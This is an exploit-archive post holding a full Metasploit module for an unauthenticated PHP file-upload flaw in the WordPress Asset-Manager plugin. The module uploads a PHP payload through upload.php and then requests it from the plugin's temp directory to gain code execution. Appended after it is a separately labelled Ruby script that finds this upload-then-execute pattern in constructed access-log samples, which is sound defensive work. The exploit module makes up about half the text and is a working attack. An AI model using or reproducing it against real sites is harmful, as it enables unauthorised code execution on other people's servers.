WordPress Asset-Manager PHP File Upload Vulnerability
Posted on 2012-12-31 09:22:33
This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. It allows PHP file upload: a user can upload a file to a temporary directory without authentication, which leads to arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart body; the plugin reads the file from the 'Filedata' form field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    # Step 1: unauthenticated POST to the plugin's upload.php
    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # The plugin echoes the stored filename on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # Step 2: request the uploaded file from the plugin's temp directory
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
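The module above leaves a distinctive two-step trace in the web server's access log: an unauthenticated POST to the plugin's upload.php, followed shortly by a GET of a .php file under wp-content/uploads/assets/temp/ from the same client. The following Ruby script is an added example (not part of the original post or of the Metasploit module) that correlates those two events for incident responders reviewing logs. It assumes the Apache/nginx "combined" log format; the log lines, the 300-second correlation window and the severity levels are constructed for the example.

```ruby
# Added example: detect the upload-then-execute pattern of the Asset-Manager
# upload.php issue in web access logs. Not part of the Metasploit module.
require 'time'

# Constructed sample access-log lines (combined format); not real traffic.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [31/Dec/2012:09:20:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:20:05 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:20:06 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzxt.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.4 - - [31/Dec/2012:09:21:10 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 91 "-" "Mozilla/5.0"
  198.51.100.4 - - [31/Dec/2012:09:21:12 +0000] "GET /wordpress/wp-content/uploads/assets/temp/report.pdf HTTP/1.1" 200 40211 "-" "Mozilla/5.0"
  192.0.2.9 - - [31/Dec/2012:09:22:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/abcde.php HTTP/1.1" 404 210 "-" "curl/7.26"
LOG

# Fields of the combined log format that the correlation needs.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /
# Paths taken from the module: the plugin's upload handler and its temp directory.
UPLOAD_RE   = %r{/wp-content/plugins/asset-manager/upload\.php\z}i
TEMP_PHP_RE = %r{/wp-content/uploads/assets/temp/[^/]+\.php\z}i

# Parse one log line into a hash, or nil if it is not in combined format.
def parse_line(line)
  m = LOG_RE.match(line) or return nil
  {
    ip:     m[:ip],
    time:   Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method],
    path:   m[:path].split('?').first, # drop any query string before matching
    status: m[:status].to_i
  }
end

# Walk the log in order and flag GETs of .php files in the temp directory.
# Severity (assumed scheme): :high   = preceded by an upload.php POST from the
#                                       same client within the window and served 200
#                            :medium = preceded by such a POST but not served 200
#                            :low    = .php requested in the temp dir with no prior POST
def detect_asset_manager_abuse(log_text, window_seconds: 300)
  events = log_text.each_line.map { |l| parse_line(l.strip) }.compact
  last_upload = {} # client ip => time of its most recent POST to upload.php
  findings = []

  events.each do |ev|
    if ev[:method] == 'POST' && ev[:path] =~ UPLOAD_RE
      last_upload[ev[:ip]] = ev[:time]
      next
    end
    next unless ev[:method] == 'GET' && ev[:path] =~ TEMP_PHP_RE

    upload_at = last_upload[ev[:ip]]
    recent_upload = upload_at && (ev[:time] - upload_at) <= window_seconds
    severity =
      if recent_upload && ev[:status] == 200 then :high
      elsif recent_upload then :medium
      else :low
      end
    findings << { ip: ev[:ip], time: ev[:time], path: ev[:path],
                  status: ev[:status], severity: severity }
  end
  findings
end

if __FILE__ == $0
  detect_asset_manager_abuse(SAMPLE_LOG).each do |f|
    puts "#{f[:severity].to_s.upcase} #{f[:ip]} #{f[:time].iso8601} #{f[:path]} (#{f[:status]})"
  end
end
```

Run against the constructed sample, the script reports the first client as high severity (POST to upload.php followed within a second by a successful GET of a .php file in the temp directory) and the third client as low severity (a .php probe in the temp directory that returned 404); the second client's PDF download is not flagged. The same logic can be fed a real log file by replacing SAMPLE_LOG with File.read of the log.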